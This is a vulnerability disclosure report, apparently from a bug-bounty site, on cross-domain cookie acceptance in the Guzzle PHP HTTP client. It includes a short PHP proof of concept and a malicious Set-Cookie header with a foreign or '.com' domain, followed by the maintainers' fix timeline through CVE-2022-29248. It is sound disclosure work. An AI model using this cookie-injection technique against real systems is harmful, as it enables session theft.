Set cookie for different domain in guzzle/guzzle
May 9th 2022
It is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header.
Proof of Concept
require "vendor/autoload.php"; $client = new \GuzzleHttp\Client(["cookies" => true]); $client->request("GET", "https://<id>.free.beeceptor.com/setcookie"); $cookies = $client->getConfig('cookies')->toArray(); print_r($cookies);
You can use beeceptor to mock the endpoint, just add the following header to the response:
"Set-Cookie": "poc=1; Domain=huntr.dev"
Also works with
.com as domain, this would send the cookie to all .com domains.
The vulnerability is capable of stealing sessions if the right conditions are met.
Thanks for reporting this. We will co-ordinate with stakeholders and provide an update within 10 working days.
We are aware of this issue, and we will prepare a fix next week.
We have a fix in progress. We will provide another update on Monday.
We have a proposed fix in place. We are sending it for 3rd party review. We expect to be able to release a fix before the end of May.
We have been allocated CVE-2022-29248.
We have just released v6.5.6 and v7.4.3 and published the advisory. This is now fixed, and the embargo is lifted.